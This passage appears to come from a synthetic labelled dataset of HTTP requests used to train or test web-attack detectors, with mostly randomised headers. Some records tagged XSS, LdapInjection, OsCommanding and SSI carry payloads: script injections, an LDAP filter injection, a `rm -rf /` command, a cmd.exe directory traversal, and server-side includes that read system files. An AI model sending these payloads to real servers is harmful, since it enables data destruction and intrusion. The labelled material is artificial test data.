Transfer-Encoding: cea5; etdirsi=t7xao
Upgrade: Csis5m/6.9, opoe/5.3, nade/2.1, dtOer/1.5, et7ss/5.5
Warning: 339 84.153.145.230 "Yjaemotaeri5e" "Thu, 30 Jul 09 22:22:43 UTC"
X-Forwarded-For: 81.227.175.207
X-Serial-Number: 5515370509152
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31536
Start - Id: 46781
class: XSS
PUT /2jxWp9@4ZaGOb/erG4@BlCz.jpeg? HTTP/1.1
Content-Length: 313
Content-Language: clorOgi,1ehv9eC
Content-Encoding: identity
Content-Location: http://www.tltyecaf.it/vpryn/tn3ed/fafn.asmx
Content-MD5: d291QWF0aXU4aGh0d1RvYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 06:27:18 CET
Last-Modified: Tue, 27 Nov 07 20:24:36 CET
Host: www.tkheeelr.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-age=063
Client-ip: 136.64.152.159
Cookie: lIuP=3@V4Eu;oExomF2rmeO6mlr=t| 75a9reH|eiO@;gnWuAg=f=);iuyiSmbTl=2d7varw689tphpWconnecteod;
Cookie2: $Version="216"
Date: Thu, 16 Nov 06 14:25:20 CET
ETag: "OrrJjm8kUjw1OpzMA"
Expect: 100-continue
From: dyenT@gpt6glsG.cz
If-Modified-Since: Sun, 03 Dec 06 17:17:08 GMT
If-Unmodified-Since: Thu, 05 Apr 07 01:49:49 GMT
If-Match: "CPkEzOXatVZ9gEKcjO"
If-None-Match: "Vt60Asb7ZcDmgpveNk"
If-Range: "QfKIttdW1bIcGTA-4LN"
Max-Forwards: 885
MIME-Version: 7.2
Pragma: tAZewos='lstla'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: Basic ZGVyZWV1bm86dGRzcVpyb2g=
Range: 462-
Referer: http://ES6A7S.be/rtAsehrt/ieyaq1y.html
TE: trailers
Trailer: Trailer
User-Agent: oaoNcrb6x http://www.annestgi.biz
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1199x1516
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: deflate
Upgrade: ggs4o/0.2, ohoge/3.3, yemtX/6.0, tweoe/2.9, anym/6.6
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eeed5=lilheh1em as2&oasup=bAi diawea9c+z&tloSs7sxrD=50006163&mer1qyyyho7cgln=group byeEe&ao--M=72397&oshoTerxsitvSre=oss2iI&NaIBKDRwX7=evth7.hS&2qsezioEhhowi=<meta http-equiv=  "     refresh  "     content    =   "    0;url=javascript:   [alert ('xactodi');]    " >&io=yV> 

End - Id: 46781
Start - Id: 26686
class: Valid
GET /azeBGQs41fsqTkH/agaeJutuoodrf5fmph6n/eev0mp.html? HTTP/1.1
Host: www.pstb.fr
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, compress
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 110.81.19.33
Cookie: rwd=05654944;gchodtlfkAeut=object&Sswhere [i8ou6cec5vdt
Cookie2: $Version="0"
Date: Tue, 05 Jun 07 08:08:20 GMT
ETag: "..6n.Srliekf7W5EV_"
Expect: l9B7meo=9eethcj
From: aenrotes@hoereselr.be
If-Modified-Since: Sat, 31 Mar 07 11:09:12 GMT
If-Unmodified-Since: Sun, 11 May 08 20:49:32 UTC
If-Match: "0r7sIX5SpgHuNyvZ-"
If-None-Match: ".sdYIVpLQ4OHNh."
If-Range: Thu, 09 Dec 04 13:33:27 CET
Max-Forwards: 0
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: isve qte6twaT=auiot
Authorization: atuQ rdo2uNet=meertmmO
Range: 76080-,-1748
Referer: http://www.aeTort3e.gov/loo6EtR.asp
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.0 (Windows; U; Win98 0.4; on-To; rv:3.8.6) Gecko/75987975
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 190x433
Via: ntrt/1.0 www.kscsRUh.jpg, FTP/0.6 27.0.89.167
Transfer-Encoding: oos77; DeTn=ten6
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 163 44.161.95.149:53 "zlfw3dlwWysuhksn" "Fri, 06 Jun 08 10:28:09 GMT"
X-Forwarded-For: 27.113.189.139
X-Serial-Number: 026607
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26686
Start - Id: 18346
class: Valid
GET /9eNoSr/alee5reay/ikY2ZMEofC/pspKCXLddZP/2r3ar3.jpg?tieyurr1eis=dliamu HTTP/1.1
Host: 172.37.105.47
Connection: 3wae5hi
Accept: audio/*;q=0.9, application/*
Accept-Charset: iso-2022-kr;q=0.1, x-mac-turkish, iso-8859-8;q=0.5
Accept-Encoding: *
Accept-Language: risee9u4-mcasacgd;q=0.0, 9-nr3l1ii;q=0.7, toisNatn-ujhWi
Cache-Control: max-age=43
Client-ip: 159.233.57.166
Cookie: N6eIy5u8eiigob=oxRm-i@;knt=aAoSQS;nTila=mr;tinsertrpsf];tat=eo;svuwo=796
Cookie2: $Version="1"
Date: Sat, 28 Apr 07 04:27:15 GMT
ETag: W/"FrEg431hhzfkL2r1zPs"
Expect: ldhpee
From: tehgh57h@ejdoaoe.gov
If-Modified-Since: Sat, 27 Aug 05 21:34:53 CET
If-Unmodified-Since: Tue, 23 Nov 04 13:42:22 UTC
If-Match: *
If-None-Match: ".ZP8XFZj_lLIztU"
If-Range: Thu, 09 Jun 05 14:06:27 CET
Max-Forwards: 87
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: NTLM ZWtONFN5aWF5N29lbEU2TEk1dHBDZXVtaW5mc2p3ZWxBb0dpNWF5N2FvYzFvdQ==
Range: 14861-5
Referer: http://www.irdrp.org/tolo/uxntgwN/rrlxt6N/tngco.dll
TE: chunked;q=0.8,trailers
Trailer: Date
User-Agent: amic/3.4.4
UA-CPU: x86
UA-Disp: 350,951,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0744x394
Via: 5.7 163.226.52.182, nstOwc/6.0 10.158.239.101, etln/7.3 45.178.38.156
Transfer-Encoding: gzip
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 292738
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18346
Start - Id: 6744
class: Valid
PUT /iCY36u./Rtaoxtlde/documentScn/ryNBhbHdf3q2/hFGHt./sw-6nUnHy-/r_NJ7Q.tW/aiuwdeua/njDIkumQgzJ5B1BHoSc/ni/tofiw/MXO.mdb? HTTP/1.0
Content-Length: 55
Content-Language: n25
Content-Encoding: gzip
Content-Location: /onccnnt/tdgy/hydaeed/cTRs.pdf
Content-MD5: dGVybjVoZHV0dHd1cGh0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 06:17:24 UTC
Last-Modified: Tue, 24 Feb 09 13:58:23 CET
Host: 96.20.75.6:80
Connection: istsi
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, gzip;q=0.8
Accept-Language: *;q=0.1
Cache-Control: min-fresh=9934
Client-ip: 50.80.85.90
Cookie: teoWTLJPlog=609441;otaaohgnrmdgar=9
Cookie2: $Version="87"
Date: Sat, 11 Feb 06 12:20:47 GMT
ETag: W/"47QAu0uB2I2rgLYT56rI"
Expect: hete
From: tm3ytg@tnto1ssawe.cz
If-Modified-Since: Mon, 20 Sep 04 02:46:50 UTC
If-Unmodified-Since: Tue, 13 Oct 09 08:19:11 GMT
If-Match: *
If-None-Match: "rjFh9LvDeXRGzEbSDVs"
If-Range: *
Max-Forwards: 2
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM aW5pOFZhdnAxZWhtZnBldGdkaERvS3NkNWphYXNzZHRyZnQ2MmV6dWky
Authorization: FEo3 te9cs5Uo=ahrUO
Range: -132996,01904-08
Referer: /nGeial/ellonu.js
TE: trailers
Trailer: Referer
User-Agent: sihsyhaon (iDbnOPOA; guGqi1; iSJF_Pf; nkXS1aFZ; nd5wD2_b@x)
UA-CPU: StrongARM
UA-Disp: 2751,8436,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3470x340
Via: 7.3 29.168.125.169:5, dtgyte/2.5 11.198.169.163
Transfer-Encoding: gzip
Upgrade: t4isjy/0.0
Warning: 194 www.tfbd.jpg "lMexobntm6" 
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 377808112519787553
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

eal3ennandjcm=tO9ap3/79~&ot=/A:Hservicesaetpriz

End - Id: 6744
Start - Id: 20625
class: Valid
GET /qetTotrn4uOCtj3/yxautoexec_U4-3Wq/scriptd7q3HhttpDl-7/positionnKewo/fitEoksqrqrst.html? HTTP/1.0
Host: www.wwwalb.uk
Connection: close
Accept: video/mpeg
Accept-Charset: iso-10646-ucs-2;q=0.4, koi8, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 242.209.113.208
Cookie: autoexecsor1Z=177;rdade=in]iEateq=nN$c t;ismnlNhunb6yae=HteH;cir7sFtjnnlfhu=~i[escripth5[ mni;shsereiYylaKn=dhn
Cookie2: $Version="37"
Date: Sun, 13 Apr 08 08:12:33 CET
ETag: "ajw5X5D.GOiOo@x"
Expect: 100-continue
From: aosan5@ntG2.uk
If-Modified-Since: Tue, 17 Feb 04 04:03:01 UTC
If-Unmodified-Since: Sat, 13 May 06 01:41:18 CET
If-Match: "8zEZiswhZfe1X4MT"
If-None-Match: *
If-Range: "edwa-kwh4RPZ4SmBGz"
Max-Forwards: 07
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: NTLM M291dWFlN2w1c0h0ZXRtRHJzQWFodTJsaTN0c3NEb2ZlTWU=
Range: -25838,-884476
Referer: /HstRa/habihs/ggueb.txt
TE: chunked
Trailer: If-Modified-Since
User-Agent: tDrDy-W http://www.sero.biz
UA-CPU: 68000
UA-Disp: 491,773,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3710x9582
Via: 0.8 www.et8nt.tiff, 5.6 www.otdv3.jpg, HTTP/2.9 www.iaeoe.css
Transfer-Encoding: deflate
Upgrade: doTsa/2.7, brr8a/3.0
Warning: 146 111.229.123.201:35 "bbrhnev4atnhijdy" "Sat, 11 Dec 04 20:32:24 GMT"
X-Forwarded-For: 240.52.92.34
X-Serial-Number: 999844116491308
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20625
Start - Id: 38831
class: LdapInjection
GET /D0lxtermM/tIRf/fsa8issjdumt9TeoTee/0n.css?npeebXsec=xSi%3D4rtkIg04ezr&cihsi=tzege2cetls&formmHconnectjA=https%3F+a%3BdoiNdoh%5Cx%3Cad&pstaw=%29+%28+%7C++++%28+cn%3D*o%27brien*%29%28mail+%3D*o++%27brien*+++%29+++&kaadx=bmtallasystem+rcpE0mochargds&iV.X=818&EwjbaYmami6s=401&ya=ees1oe1&ynRi=20 HTTP/1.1
Host: 186.41.31.37
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.9
Accept-Language: uq7ny9tu-mGz9rzz, rinnezc-n8jdhs;q=0.2, 3dsa-gtsrchA, h-bumhd;q=0.7
Cache-Control: i=qhme
Client-ip: 147.81.36.108
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="4"
Date: Sun, 30 Nov 08 13:46:54 GMT
ETag: ".E54oRpEfAdmv5Espqw"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Mon, 24 Sep 07 17:18:19 CET
If-Unmodified-Since: Sun, 17 Jan 10 07:44:55 GMT
If-Match: *
If-None-Match: "8mdIMWuq4Ksbg@kn@pR3"
If-Range: "C8uIZy8BQ2Svtorr"
Max-Forwards: 7434
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Basic OWF0ZWluOmNlempoYWY=
Range: 088-865,-53,38290-
Referer: http://aeiehsd.ch/ltka/augnGsk/fiid.css
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.4 (Windows; U; WinNT 7.9; ra-ee; rv:8.4.4) Gecko/18438407
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: a8rw6a/8.9 126.54.17.200, 6.2 www.irnrrlb.htm, FTP/6.9 www.frtefcu.js:575
Transfer-Encoding: compress
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38831
Start - Id: 46814
class: XSS
POST /nBAd/lc-TcvKZwByln/oMNUw5ZGqjC1/2ah8nna3proor/aQqJ6_.b3n4@/lBwuF9-5.cfm? HTTP/1.1
Content-Length: 91
Content-Language: nr,olp
Content-Encoding: identity
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: MGthYXRkZ2Vvcmlybnl0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Jun 08 09:41:20 UTC
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.hn3iomAmld.it:5707
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.3, iso-8859-3, windows-1258, euc-jp
Accept-Encoding: 
Accept-Language: hdn-k5;q=0.3, tiaoinr-qt, Ibhttn-EufmdWr;q=0.6
Cache-Control: no-store
Client-ip: 180.151.251.196
Cookie: unf2aluhntotlf=163;zmyrraAq=76
Cookie2: $Version="66"
Date: Sat, 02 May 09 12:20:07 CET
ETag: "y@tKjzaOGXeONi4MFD"
Expect: 8dnkgH=irvMm;lecee
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Mon, 07 Aug 06 01:32:47 GMT
If-Unmodified-Since: Wed, 08 Jul 09 08:58:31 GMT
If-Match: "IivuB7J5hPJGPwFpQvxu"
If-None-Match: *
If-Range: Thu, 09 Nov 06 12:57:01 UTC
Max-Forwards: 4
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: http://naeosoeN.net/ata4/koseoftr.mspx
TE: trailers,gzip;q=0.3,trailers
Trailer: Referer
User-Agent: 5U3I344x49 http://www.rnnuj.fr
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 7.3 www.r7eFut.css:6
Transfer-Encoding: identity
Upgrade: 5mhC7/9.8, bsI/4.8, h1ae4l/1.9, hen/7.9, ge4/2.8
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dtslawelq=~insertH&etn=<<script >[alert   ('Rti');]</script   >

End - Id: 46814
Start - Id: 31245
class: Valid
GET /FbCTDvI-PE/pEu0Js8cbS5DXa/ierv9Pealge2RsdEewrL.php3? HTTP/1.0
Host: 130.55.65.247:80
Connection: gonpranq
Accept: */*;q=0.0
Accept-Charset: windows-1258
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 203.100.137.251
Cookie: R%u7mLni=926447;eurbinmeot9d=lisniszfhnn9d;nmr1ocehabmTat=48sofajeooe
Cookie2: $Version="28"
Date: Thu, 01 Jun 06 06:14:10 UTC
ETag: "dX63Qs_s@JrSd_v_W"
Expect: 100-continue
From: ettihl@s2tpbthdps.com
If-Modified-Since: Tue, 06 Jul 04 17:45:33 UTC
If-Unmodified-Since: Sat, 27 Jan 07 11:12:35 CET
If-Match: "elW59T@SC4VeLOeTfS"
If-None-Match: *
If-Range: "6am13tziAX5yo.1N"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: viaQCQi=ier6e
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: sflw5 apbaN=coive
Range: 835058-581
Referer: http://www.6assan.st/gsclr.pdf
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 8.5; ht-1b; rv:0.6.9) Gecko/19286783
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3795x126
Via: 2.7 102.214.73.244:06708, FTP/4.6 www.aduChitd.html, FTP/2.2 www.o4reyhcp.html
Transfer-Encoding: deflate
Upgrade: jilg/6.7, vNuli/1.7, 3ea/3.2, eNa/1.0
Warning: 221 www.O4or.jpeg "kaaoteuyfsaeeehare1" "Wed, 30 Mar 05 17:25:44 GMT"
X-Forwarded-For: 163.11.230.199
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31245
Start - Id: 43022
class: OsCommanding
PUT /trredl4eeh9tnesj/etlrbfa2rsrss/W5bF-/doHpttdawto/rp/ktaH/hkAfHKa.q/AQHKEK5NUmvjI.shtml? HTTP/1.0
Content-Length: 72
Content-Language: eMI8cim,5e,hEnoqrj
Content-Encoding: identity
Content-Location: http://www.t7ncm.net/afeeluO8/4xpldasp/4tetel/lMntl.wav
Content-MD5: ZTVvaWVtb3NlaGdvbGVyNw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 06:40:20 GMT
Last-Modified: Thu, 30 Mar 06 20:04:01 UTC
Host: 39.184.115.8
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-roman, windows-1253, x-mac-cyrillic;q=0.7
Accept-Encoding: deflate;q=0.5
Accept-Language: Ssd-eooc;q=0.3, si5wofnr-we, mypsgiji-ekreni;q=0.3
Cache-Control: no-transform
Client-ip: 46.198.129.51
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="6"
Date: Sat, 02 Jul 05 15:37:25 CET
ETag: "MCaPKcldcM8leI_Vy"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Sun, 12 Mar 06 08:33:59 CET
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 316
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Basic cmlnNzpxaHN1
Range: -98633,070828-,-9277
Referer: /lP0ttoet/ernt24/xs39y6c.exe
TE: gzip;q=0.5,deflate
Trailer: Pragma
User-Agent: jahrttaed (na6vLXZhl; nXSYImNEp)
UA-Color: color32
UA-Pixels: 2695x320
Via: 0.3 www.5hN0l.shtml:9, HTTP/8.5 168.223.20.107, 3.1 www.ohwoubri.gif
Transfer-Encoding: gzip
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

yirdy9=`   rm   -rf   / `&pf=2925391&ihrnLnqtes=elwhere6p\npmbog

End - Id: 43022
Start - Id: 43767
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 104.10.45.245
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1251, iso-8859-1;q=0.9, euc-kr, x-mac-hebrew;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: ao='p8'
Client-ip: 111.17.94.212
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Wed, 23 May 07 21:23:21 UTC
ETag: W/"v8oIFfpbb9jaiyr"
Expect: wspr4ebT
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Thu, 10 Jun 04 19:07:31 GMT
If-Unmodified-Since: Tue, 25 Oct 05 05:57:49 CET
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "EGU7l-Ye4iMV_T0X-"
If-Range: *
Max-Forwards: 33
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: http://www.7r5ifpct.st/ttsr.fgf
TE: deflate,deflate,chunked;q=0.8
Trailer: From
User-Agent: h5w2kczj http://www.txl1ciu.com
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: HTTP/9.9 www.oxuqsnf.css, 1.0 193.202.64.234, HTTP/4.2 215.58.113.179:3
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 725 239.192.69.199 "oo5kiaaie" "Thu, 23 Jun 05 19:03:49 CET"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43767
Start - Id: 21869
class: Valid
GET /ftSssfTgnx5dsoe/ni.KHyrIU/SirWnqnArzrkl/hizisidlu/mee6siaaiwdlrsnsngp/WAngkXSYxQf.v9B/lhhyigOmspXhns.msf?CXuE.8etXfek=lRa%3D&Ntkwsmez=ntsa&dsteedi=hfireao9im&lsr3uocuo=2333227&77ibwOeCaem=l1if75&ii6kamrittxt00e=facotw&s8riAZloo=aoaoaae1ncopymochaum+olllld&tgdzta=21&L8fMQfDKiL=i9riayqoEpT&ec=oemnaUi3ty&xx6pNRk5n=888&qdeMed3tahds=tia1yqV73V&oa=th8F&jwNt4larap=e.L&CE9GdTug1TqK=9R8%40qtD HTTP/1.0
Host: www.hwdeeaSev.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=37
Client-ip: 192.131.218.71
Cookie: st=1;cksonutle2wqnnq=63;lnnAbtxqniretd=tl
Cookie2: $Version="2"
Date: Tue, 03 Feb 04 01:39:25 UTC
ETag: "_oWm6wFQ0bxMU5_"
Expect: 100-continue
From: iese@tecT.fr
If-Modified-Since: Wed, 11 May 05 20:18:08 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:21:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4658
MIME-Version: 2.2
Pragma: slccnN=tuiys
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: nhS2bu tseedi=nlphaPac
Range: -34244,001-
Referer: /ulabt/skmgft/1tx1/nrlao.nsf
TE: deflate,deflate;q=0.7,deflate
Trailer: Via
User-Agent: eurey8e/7.6.4.6
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5382x0739
Via: rAhTe/3.1 www.tmea.gif, 9.2 www.bott.png, 4.4 www.neGnd.jpg:9
Transfer-Encoding: gzip
Upgrade: foarn/6.0
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21869
Start - Id: 40355
class: SSI
GET /jo-xufnullJU/ietl5e9uI/dY/emn.php3?vYpANA_w5YAservices=6591071&arBnatsz4=ezIL&mcqtii=76529&8fainA1cQe1etd=o1EJHWpvqE&ekAVK=ooaik1lunc7nars&aSeTteytaot=6aa HTTP/1.1
Host: 53.25.101.25
Connection: glpdh
Accept: */*
Accept-Charset: iso-8859-8, windows-874;q=0.4, iso-8859-4;q=0.3, iso-8859-2;q=0.7
Accept-Encoding: compress;q=0.2, deflate, gzip, compress;q=0.3, gzip
Accept-Language: ibO-Ns, Fti-oh, n-g6ejg;q=0.1, hui-pttrN;q=0.1
Cache-Control: max-stale=8
Client-ip: 225.218.231.89
Cookie: aeiazuawttsze=143;qsthje=u
Cookie2: $Version="937"
Date: Sat, 09 Dec 06 05:57:05 CET
ETag: W/"fpl_pTYp673AEmDit"
Expect: 6tot=dpitp
If-Modified-Since: Sat, 12 Sep 09 09:07:26 UTC
If-Unmodified-Since: Wed, 05 Sep 07 22:21:01 CET
If-Match: *
If-None-Match: "xhZqkQ56d862nCD"
If-Range: Sat, 16 Jul 05 22:05:14 GMT
Max-Forwards: 27
Authorization: Basic N3JkZTFlTjpyd29m
Range: -62942,193769-
Referer: /noret/hddae.aspx
TE: chunked;q=0.5
User-Agent: <!--   #include   virtual="d:\windows\autoexec.bat"   -->
Via: FTP/2.2 www.snan0Xs.png:1416
Transfer-Encoding: idodd
Warning: 603 209.229.202.179:95978 "oe2n7zpejaLsese" "Thu, 17 May 07 21:39:03 GMT"
----: -------------------

null

End - Id: 40355
Start - Id: 40402
class: SSI
POST /tsadaw/aWoab8fisq/ea3zebwb0ieadilr/OPD6/taGAkZL-ArZVk8en9nps/u_v/QQJd15CU7XTX4Ssock_stream.php4? HTTP/1.1
Content-Length: 218
Content-Language: neurr3u,eq2e,1hwmt
Content-Encoding: gzip
Content-Location: http://www.Tyti.it/eqcSRoeu.mdb
Content-MD5: NG5iSWxhOXN1dGtmbnRhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 04 12:11:57 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: www.eoTmbpetb.org
Connection: gddSahe8
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: identity;q=0.7, gzip, compress;q=0.6
Accept-Language: ep-ata
Cache-Control: no-store
Client-ip: 16.69.2.56
Cookie: bbgsoundf0=eqc8wchb3enap;pLumrLr=6s:@%
Cookie2: $Version="13"
Date: Fri, 28 Jan 05 23:15:52 UTC
ETag: "dzp3joQvsU@HpXG-X"
Expect: 100-continue
From: nvecwD@airnsvo7rs.com
If-Modified-Since: Tue, 17 Apr 07 10:12:21 CET
If-Match: *
If-None-Match: *
If-Range: "lt2PQGjA_PLBnxQD"
Max-Forwards: 00
MIME-Version: 4.2
Pragma: no-cache
Authorization: Digest qop=tnkd
Referer: /fhmheei/lndaee/y8qekaon/8bfj.jpeg
TE: trailers,deflate,trailers
User-Agent: 5k9BCvp4 http://www.Siaetsan.biz
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: s9qavf/3.0 231.238.89.235:446
Transfer-Encoding: nker
Upgrade: anoNn/3.2, nnna/8.2, etrp7h/2.8
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 24.137.231.7
X-Serial-Number: 60721340787846
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5e=144&MMMYU4V0qG=Mhm5n&zxhoPaittnhloeu=otne&Yo3Tand=[ihjd&awiptatki=w2Ti&oeufonjglNc=<!--     #include    virtual="c:\winnt\system.ini"  -->&n5bi=05&aESNdocumentAFLleQ=imIiKu-CD&iagtesoiotioo=344

End - Id: 40402
Start - Id: 14767
class: Valid
GET /eK5ms./es/usi/wo/z-mU5CautoexecncoStD/l4dHt3ogerwrwge/hm-qtVbyk3LjaJg3h8P/nen/i.zo-KIEhYrsniec0/lnph-8acceptcuj1ch/Ooma8fnRiT1azmettey2/nr.cgi?M7vZservices64C@libA5=60678492&06hissree=+%7Es HTTP/1.0
Host: www.nrlbaanih.cz
Connection: close
Accept: audio/*;q=0.3, image/*;q=0.8
Accept-Charset: x-mac-roman, iso-8859-8, iso-8859-15, x-mac-roman, cp-932;q=0.0
Accept-Encoding: deflate;q=0.2
Accept-Language: t6gttTls-m;q=0.3, ta-ouo
Cache-Control: only-if-cached
Client-ip: 175.44.0.235
Cookie: h@objectuE98x9sEx=eierhuoe=vbscriptt;afnr=eaP%put1sotccat;i
Cookie2: $Version="4"
Date: Mon, 09 May 05 01:57:00 CET
ETag: "ga01jo-PI.qvKcw"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Sat, 10 Sep 05 13:10:00 UTC
If-Unmodified-Since: Fri, 17 Jun 05 03:35:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 050
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: el3ew eon38=myylbi
Authorization: Digest username="yegsaes"
Range: 31145-
Referer: /rtSgt/cnnlN8b/oxeevm/tesi17th/per9.bin
TE: trailers,trailers
Trailer: Authorization
